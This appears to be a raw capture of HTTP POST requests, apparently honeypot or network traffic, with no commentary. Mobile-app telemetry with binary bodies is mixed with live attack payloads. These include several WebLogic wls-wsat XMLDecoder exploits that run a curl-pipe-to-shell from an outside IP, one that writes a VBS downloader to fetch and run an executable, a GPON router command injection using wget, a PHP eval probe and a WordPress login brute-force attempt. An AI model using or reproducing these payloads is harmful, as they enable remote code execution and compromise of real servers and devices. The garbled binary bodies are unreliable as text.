EKxWk9ieYlveNma5elfwVsqCBpPXMrwNkYz0AdXgmboWpxKMV2+uiuf3a72YUnHcyZu+3uCiH+OiM2HU8jv4C9vkLkJGQ6Ocv7VrACLseBuQjCpTF4r0D2IRYOIlnGBHbq5P2ELWRblydRiE3KWV9xi8M6upAYS9xSM4KxYx88JjL4NimOzlpyyc3cUHrnxlUi+19gFU4a/xzMBGLVtQNfs/HYRCRzlp4Cx5aICtioUVXUkqvE8/ZP98nYeJurv2FoLMYovJJnA6mIR4EqzNAz9eC4SC6GDi5J51Ah/7bHO5If+3op+lFyeASIlYDVTxNVYvoZdmSLGo9luPjJ/Jrq1MdL8RWW52Pw3YGVlVSd1oKwF4ZV30+/9FaxQc0jCDORLPTQRttDj+PiOpIGN1y2bnnZ7Pxg==
POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496717505026
X-Umeng-Sdk: Android/6.0.9 PopCat%2F2.1.2+MI+4LTE%2F4.4.4+D2EA899797B039FCD23DDA127C0FE621
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2393
1.0517e9b7f56240b158d00af66@2a5557b6525c7ee069ecfe09c5af4174433522e955975e55361aaa93d1893159 ÷˘¶ì ËQÉxú≠Xks⁄H˝+)>Ìn\ûÓVÎE’|ê–#8nà@ññ)óêHËA‚°©¸˜Ω-«±ùx ≥ Ö ‘Õ}úsÓÌ€¸Ÿ[TÒπ◊ˇ≥ólΩ˛ˇÏôh†)™ÆPKQâJ ”TË@7
E!ö§⁄mJ„^ø˜)œ£≤w’ªoäm <㙂:OÀMúÏ6ª}ß’ı∂⁄F·˛˙SµÑ{ÿΩflı˙ò™í®`Å,ê´ûëÓ∂` æ/Ùæ^]ú( UB?òˇÉ;êHAV®®K5ES&Îä•àï-]J“Æ™UûL¬}Úœ#EUQ(ÜDπùœ˚∞ÜïÔQ],aQ"î*‰û¥3ˇ©NvªÓ”’Â\â¢å5ˆœM=ÖvqÛœ
ò`Y˝öN &’1&Ü¢Úˇ"!íÖ®NëEk†Àöv9¡SUAD‰WIEß∫N4Àh A,Î2’LCî/ÖÑAˆ*_»D~!˘B2·ÆD$ “•xÉ™,#Ex;·˛q’€AiUÓ:§¬f_m√UÚâøª”_YÜQ≤®™ÕuÔÆ5XM (qí˝±™7Z¥OÈ˛ ≈MÓ¡YØØÖg˜˜<|OËÈ˚òìLx¸@oäÚÑ˛±øflßùØo∫íLe¸Éa¨™
`WáÀeÒW«2ج¯˛˚3,BU`Ò™◊l_.Hº˜ìØWΩ§å• ÅJ*¯˙Ò˝´ÏÒC¸ ^1)PEïÖ_‰DPÅ÷GNfi<,^„ј|IF/9°≤à©'
∆T¡?s%Í+úà·—Àp“H@˘¢¥P8≈OuÚ÷îÚ'
&"û¸dX@ÁÑOíD…e8È≤.
®pRıI‰où?Ø
Ìò
*í…œÜÈ€Ä*2í_†‚œÄÚ÷ØKó¥ í+ Ì≠ì0NjË2LÛ$æØì/M≤„ß#ÏFî˚]≥ÿü∑‹—áœü¥˜`-‹n7 ?ÅD,'ÍB^Ú±-∞®ƒÖKIzÿsHÍ]Á¥GÆÒ5 ŒŸ*o"Èaï†ˇ`h1∞mÎ}T≈‡â悉êF…}rÿÃÜÔË≠kÚ3∞i´∂…flw="ñQ]¡ûÌÖ®ØH˝HÍ´J)ÙïòüÓ≈∂NÀ=üoè
”˝‹M∂ oÍÆâFÆOX¶ùG∆̓≤ç∑˙ÚÒ äwˆ`]0˜f∏‰xC¡w≠µì≈≈»òR«àNÛ“Ò&ÖüçEøò û˙Ìò¯fik∫≥]îÚΩ”ÓéX«»RIpw”Üû⁄ÿ⁄Ù|õô
[/¬∂˛"f≥»ˇhO6ÛíµXõ•#{R8Ÿ1√l˝6/|óùXlXô}ìçåY&afiT3HfiD¬dΩ∞OKü¨◊ãBÃ˙Í„ºúıêS>µOÎdÚ“◊£'øù¨ ,ã∫Ïù6"¨ùmXsZßl÷2èâÛ2pß⁄‡ofÚh›q«gÊöB`[i`Ãrflõ@Ï Å5€lœ<è<≤õ“ëaj¶˝î |=2d∂√#s£=3|x±36k«í„Æ<≤ì§yŸ¯òsµ v
ä!ˆ≥©Ëx>p4=;ÓzÌ∏˘ö_¿2u≤à¿:Ú›ï8Ú÷¥Ì!¬O9ÕK»
›f„∆—ˇ"+cù:‰fÌxcò°¿ëCÄ{¬∞”öfi<:ŸÙfiµy©›˘æÓö{vF≠µØGM]8≥”™
Ï1 §†´33&˘»ùÅŒ÷©O|`A_;êãc;©ìY9d÷"
YivX‰(∂gg[∂l™/µüÂ<Fˇƒ
,ç1hbÌ∫p¿∫OÄ œŸ¸√6L¬Y∞÷∞K”?È°7ˆ?c¡io
ÿŸ>yV ä)
ä0ú¨GdÔ1ƒN?#3/96AÁN1Ÿ¯YºÜJ:ç @fi ¿?0íM ´2섶ȃ©|OlÔË6ÒaA‚]0”w˛›∆õóúŸüyÉÏ&cô)pÑ!F *¬#îkòÁ¿BΩÃ
ßòÂövjX-B‡u^∆ñzªæ&‰yÙJÙ؆fhh®8™Ω’pP¯âìÔn Ê
ʵ,xæfçᲖ∞2÷˙àÅ|W/€u`˚-œgô„ZXÇû2Ÿh⁄Ôøœ˘M˙Í}µ{l]l8v
ÚÀ∑ÊO(Ã∞QX◊)Ô–=◊º˝8büÕ€ßo>µ◊YwJ=\)óM˛¨çãfl[‰¢
k~fi±œåè9=wüFa~ˇ–fiüı‹∞l‡>∞oÍŒı]VE⁄]ç¯qm“r’5–ê
´ >‹Bo≤‰¬1⁄ „ÚgÖIô1¶@
÷ TKfi-¿<”Vö±¨Ã÷-(ƒ
äpõ9Ymedl ÷V4– ≥›vDfÁ–≥v∂∂¬ ^(ˇ8ö,Ë≥=f»õÔdµ»a,Ä5èÌo“4NÖ[^¸≠∂πA;éæ;ôª¨√‡∞ı(ƒÈ@”f€¿∆g≤J†V¯–ÖÚ»|—áÚ ‹I&Ü≤Abö|k>?≥¿’lkk
o/êΩdÉó«äÈΩˇ¯>üó)≈w ÕµNøzje\Wi¸Ì‰‹•´2‰¯Ûã≤––æ@˙ä—∑P_V˙HËÀF_¿}"˜ë‘7}ÕÍKÉæ!˜Xà∂
∑8a˘›ß∫‚™®Íwurxáfl˝Î ÁˇÓFâhÛwf.¨xÛLk“5∫Êó†oZÈf(¯"¡Öí~Z]‘a?óP¯¯≥±Áø 6∂j }Õßâ°—ÅÒÃΩÜøNxE,¬ÁXñ…íÜÇ≤î‘pA∫\Ü"
’d!FT‡n.«èY}üx
flÜò'†ü©ΩÀ‚£;UËßnzàä2ÍÊÑ˘tíᙥ‡Q ã÷aYvc…√Ød¸vˇ“‡C
√8(
T¿î Ñæ~˝0¥å”@418b9bb61ad7d2e02767b70975247d7436bed9e9f11c41554191039373020500 cd5fff46f7c64f24d9f26bbc314d13cf
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å:µÃ©Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î®Y›∆√«∆fl
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Host: x.x.x.x
Content-Length: 376
Cache-Control: no-cache
Bw22mXUXA4ZNHsUp4KG6fWZBhuyiwPMMIVwuh3pk8gPzeg7PFI/EPtOV2jE9fsIz0tk/DBYiU7WMfP1Cjs9yzmva00fjmn8i/aLNlU/LZ5/iwFIXFBwMssKtEKi5sub2TJ1qXE3TLEskQX1A+fpcznkLPfaA6BwpLWSNvGh52inn/HtvXMAQtB7MJYbOAQMkihynUSDw4/qyXeJC1zbzWtpSzoNvGt5Xxxr1LCkMydjPwEo7m0AcUjGG7w6F9zlhXsfzUa4d1/vSLn7hOg3Y6/dusgC14nPBo6RY3sffNuHIfYQW7GVbLX0Lou9BthIPgRI7KUQcxNfEdDZAM4yL563dqUPN/bXGrON0q4HzeLC+D2ndFUJV3Nty
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://cfg.cml.ksmobile.com/post HTTP/1.1
Accept-Encoding: gzip
Content-Length: 1031
Content-Type: multipart/form-data; boundary=lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Host: cfg.cml.ksmobile.com
Connection: Keep-Alive
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="protocver"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
1
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="ran"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
706169
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="sig"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
754fa4f1e226c43b298238c2739d4278
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="flag"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
0
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd
Content-Disposition: form-data; name="data"
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
{"module":"searchengine","mcc":"510","sdkver":"1.14","appname":"iswipe","did":"6ccc52a8048214f","modulever":"39","language":"in_ID","channel":"2010002546"}
--lDEACMnHv1SyxaTvLtlPk1Mem5AfP7Vd--
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /CGI/Execute HTTP/1.1
User-Agent: curl/7.35.0
Host: x.x.x.x
Accept: */*
Content-Length: 125
Content-Type: application/x-www-form-urlencoded
XML=%3CCiscoIPPhoneExecute%3E%3CExecuteItem%20URL%3D%22Dial%3A00%22%20Priority%3D%220%22%20%2F%3E%3C%2FCiscoIPPhoneExecute%3E
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 26
Cache-Control: no-cache
log=jamesatchue&pwd=456456
POST http://behacdn.ksmobile.net/adsn HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 78
Ns}›~ÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcpj@WTıÖƒ¶µy¥LRÖÕ_?⁄ÀhX{$∑ãÑç"–JÛ∑
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://alog.umeng.com/app_logs HTTP/1.1
X-Umeng-UTC: 1496391414215
X-Umeng-Sdk: Android/6.0.9 Block+Puzzle+Jewel%2F18+MI+4LTE%2F4.4.4+51CDA60BD75DD94418ADE9CC4CEEE046
Msg-Type: envelope/json
Content-Type: envelope/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: alog.umeng.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 2493
1.056aae48ee0f55ad48a00142f@e77f4dd0e2fdae30dbe89ae5dab79eeb8847698ae95046185f6dbee004792959éà¶Äì ‰VÊxúÕWks¢ ˝+)?›{ON•Í|hÂq0ÈftP“\OY( ɯĩ˘Ôwc2â3ôì˚ò∫ßíîïÿ¥{Ôfik≠Ω⁄œùe‘Âsgø À4<ÑiGÈùÎN∏9tî~Óp]]ì˚¬†è@√™."±œı’ûx˛A“yS¿ß / µ<XUîˆyQf^
Å˚lõ√#ÿ·ŸMØVaÊ~XÖyñ«(Ƭõ›&.´õ¢\fl¯Ö_ÏPp∫Ò∑€º›bøäqUC§j◊Qx±fl«À}ıØúSÈtæ\?U‰ìpWyee¬ÚˇVMOÏÒË˙ªdóe¥u~jü¸5›ÈI®À]ˇY÷Ô ˚´@CHÊ≈fi{
°>‚≈˜‘”ö,…›ÓªMÓıªÚ;MÓãr˜›Å&BW‰fi h/Û<˜~@Éz§fi€†˝ÒÂèÎŒ˙ø∂¿GΩ>õÈ‚“MÉ}GÅ|]‚âØf6ÿ»uTÌaô{nŒø ÏKØä㺣à\Øù odA‡ "ˇíÂW˛?NsUz5∫$˘gkó8ô;ã,vEÈßkÔæR∞pı©]¯nÔÕ,览ÜìµÀØà èü´]ÊπƯvñ^O˙ÆÔ è/◊ù(ÙÇV»ü;+/N√`QÜ{P¯Óú¬Û˝p∑[ψÀ™fi∂˛˝”G¸ ш∂€MwŒé‘ıºPÏÖ!∑í$/{«Ò"Z=ÓY¿êÿùKÏ=X*√]ëÓ´ßï>‚˛¡s=<Ì[¯Eix"±.2XhœDÃ+ÒŒ÷⁄S≈Yÿ9lìüw}/^ÓóÏ…|xÁqJØ´¯]•flSVÇ“ ‡AúmÀ8Ø⁄qu2»@‘Ó˝dªt¶Lµ5Œ≤YC‹õÒ◊·®±fiß{c∏>Y™èX≥Ê “j“¨ñç¢˙'◊—–<wv≤úY‚™4•ÜâàJÍê∆Èë›ß´•1CÆsdU_A$g˛°Ù∏L‹BË(q≥YÊ"éŸÉ5Û‹RiÏ™º‹»r∆'í¯Çõh"I¶¢kOOÆ:ãÒÄnó9Âòs⁄›#˝ËÎ}‰fièœÈÔ
lû¨ÅwõS˘nû«3ü›™>œÏŸÜ6ABT,±dQÉà‘ãñç!H¶At&gCO,õ‡·wëÁ˘eÏWëS¢Í¥!ŸXtì5‘LjÇF Mhô†©>≤Sd√™0JÁπoÙÎ@Ô√I&©üª—r∞B=Nºm¬ZL€÷ ‘—xWıÜLƒl_Ä<U≙:dÖhÕXbÕ,ûÁ i'7”‡4⁄„ øt“ç1ƒQ”‘UaΩÅgt√ö0{ 1{√S{≥ƒDñÌ◊ÏÙrÆy~y2WÏ
"à Æäkö—ƒu∆µeÃñÈÙÙDåQ 
ÖAŒæE0,© OÀ8Öû4sw√lvÇà»24Åf‰Hù±Ha›R◊"m÷'ÜH˚:ÓçÂ@‰¸≤f5CSÜm
»twA&ÁâLˆÊ≈4§ "7â™2ë&&ÁfnLUÌË™¶@Ï b6çÊ9∆˝ 2—Ç9“˛Ã◊iüÛåY≠æ∞€èfßuAõYÖ
—‘RGÌÿ∂Ö®z¬úÈqûC#2`¡´∂‘
Á⁄iD«ÿ
]™r.j¢j¬ùç˘;€îÙCç™—˛∂猖,u≥ID
4∑ë@[Í$µhqbâ
yç#™y"Ÿîgh õä‰à≠sta÷@€üıÜÅJflh
¬=´mz§j∫° ë(ÇF9¶ƒÏ4Ö^ PEœ`˝ƒl=√É¡E{&Q`Ã8œ·Åø∆Ä\E4A[V2FVBö7ç Í0…r«íqMìuM=. P !íçR“l$¯_r1æ]
td≥⁄GÈa≠u:πªd¸cÖ4∏°P/…L‡k¶'`zFIM7‡n•o¢cxz∫≥IEN¢h{»‰‘ fO™KÇÑ"ò6;ã# TFõAJ≥1VÔGÈì¢èKt⁄2a∞Wµ∂†∂’jhΩvÆ
cDA”§:5¥sC*fç±˚‡›O8˜fid81EΩR'≈›i{ µŸÎV?0Õ(ÙŒ<R4â]9öd,õÄVP)‘'iª∆ø3EÀLJaÍX–ï
(¥Ö⁄êƒÖ˜ÉÙ££9i!ãúŸVe Ü<∞Ù?fL†6üß¿&t%
Ljuz.4Æ⁄ö¡¥ÜÛÅÓÒ`:уπ∆X¢ô≥ñ[-fl_lÁ£eCWÌ…Ê&º7y®Î∑y^ƪ(v_ΩçòSÛφã÷;
íãˆΩ≤åØ‚œyq›ô|^=€¯jü^∏{˜≈cóÖW∂ÚâÙ˙≤¯h«UÏ{È‚—ˆ˘;ˆÚ˝ Û´}yNy{E∑æ,™“Û7qænΩıËêa¶Ô›flGœô¨<gÑ<æ5¢é¡ 4ŒçºOÛAÎfxç’•£'∆@èàZ¿∞⁄ÇoRÎÜ€å4Ö˺‚rª·£YÌ9˙Œ¿Îvú®¡é÷‰€òê±…f™/–§UhØ"∂—!«Y∆¥E¥¡ ë¬é#Éë‘2Jfl™}·÷˝Náœ∂Æ¡oËdΩŒìZ? 5pØ%.∏%` SXlOè,3AŸpT‚<ø`ÈΩ>6±1>‚3∂ –¡yPqtU⁄≈΋k ODQëÜäÆ)í®®ú"ÀJ+=]A]E(CNDEP‘Wd§à‡o˜mƒ 9»WÀ¢≈ª(Ø p≈_˝Ì ßá=[»[ø‹ñfi˛2÷'ÿ\p©{√›Ù;œT8flQt«˙ ™“ÀÉKé<^&aÛÇ—]ÏÛ™lØë¶zn E6Ò~œÃ ¯v÷Åoka¿Ûê@(OΩæ$qÀ%͈e‰∑â„›6ıÍØÁ§Öøπ˙∏oö4ºÖ«Ûe∫=“”]ˆ•˝‰>üÍ÷ûˆƒèÁ{§ü²£∂R/_Ô°}.n!Ù#/œœwSflÀ∂†◊∆˝Õ˚6fi£VyQîQÄã1«q_æ¸ •óÛ@6376e5d0bc8bc8303a9eb2e52bc143eb1c31c68a2126ea18bb1b55e0840f1900 36c205d54670cef71307d30ea9d92ef1
POST http://uc.ucweb.com:80/ HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; id; MI 4LTE Build/KTU84P) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Android 4.4.4; MI 4LTE Build/KTU84P) Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 469
Host: uc.ucweb.com:80
Connection: Keep-Alive
<assign data="0tiawOjp+Yed19SRsLmnksOI0IKwt6ee3Yvdhqy4osXXiYiH5ay30YvLmtru4KqF34nHiq++uZ7aj8uT8eL204jWm968rPbJisuG2uWst9Kd3JvS5uv509ObpPqhutvzq5vJ3+D94/id3JvF5PyqhcyZm9bg/eTOidfUkefv+9SLm8ne3uz+w9Ob2oa0rLfKsdqBjqPp+MiJ1Yye8eL23syZmcHls7Xyrfub3Pb98tXMmYXS7+mqhYfdy5Pj+u7Xi4TL9Must8WD1o3WvKzW976bycP36+WazIrHgqOu+vie34DXvKymlNebyd7e7OTCn4TLgra+pJbeiNyRoePIw4CEy4K4v6ae3oDagbW7upCIgYuEsu+nhc7XjMf19+fC05uH1vWst9Ka3YDXvKzBlKTBs8HLyMbSmf2o/vXpwYi56rCE7ri1h4/QjY6jrLeI0M6Z"/>
POST /wls-wsat/ParticipantPortType HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 2471
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>cmd.exe /c &quot;echo Set objXMLHTTP=CreateObject(&quot;MSXML2.XMLHTTP&quot;)&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.open &quot;GET&quot;,&quot;http://198.50.179.109:8020/taskhostxz.exe&quot;,false&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objXMLHTTP.send()&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo If objXMLHTTP.Status=200 Then&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=CreateObject(&quot;ADODB.Stream&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Open&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Type=1 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Write objXMLHTTP.ResponseBody&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Position=0 &gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.SaveToFile &quot;C:/Windows/temp/taskhostxz.exe&quot;&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objADOStream.Close&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objADOStream=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo End if&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objXMLHTTP=Nothing&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo Set objShell=CreateObject(&quot;WScript.Shell&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;@echo objShell.Exec(&quot;C:/Windows/temp/taskhostxz.exe&quot;)&gt;&gt;C:/Windows/temp/getpocc.vbs&amp;cscript.exe C:/Windows/temp/getpocc.vbs&quot;</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /GponForm/diag_Form?images/ HTTP/1.1
Cache-Control: no-cache
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
Host: x.x.x.x:80
Content-Type: text/plain
Content-length: 119
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO - http://51.254.219.134/gpon.php?port=80&ipv=0
POST http://t11.proxy-checks.com/favicon.ico HTTP/1.1
Host: t11.proxy-checks.com
Proxy-Connection: Keep-Alive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.5.21022; .NET CLR 3.5.30729; .NET CLR 3.0.30618)
Accept-Language: en-US;q=0.6,en;q=0.4
Content-Length: 0
Pragma: no-cache
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST http://appinfocdn.ksmobile.net/gmi HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: appinfocdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 215
◊ ™∏—ó;eò@YMp<%iÅ˝Yª?ffA0#]UAIeJE‰ßB‹ßejÅÓMúyíi∆Ÿ‰—:Æ·ó‚† (µ÷a(8x[lïAéG÷ŸpŸ0U¢±±U¨Œ§\e2.fYîœ)Ú }JüHì›˛^&nc˘s ı짩^ª.≈9÷I ’Ÿ P"µ⁄îr’´T*√îtflùÅËLXFÉ5¿îÊ1ë√Ó€}i$X9·X™v≈õflˇD‡ßßz ◊¯)P0—Ú-ô]À?6
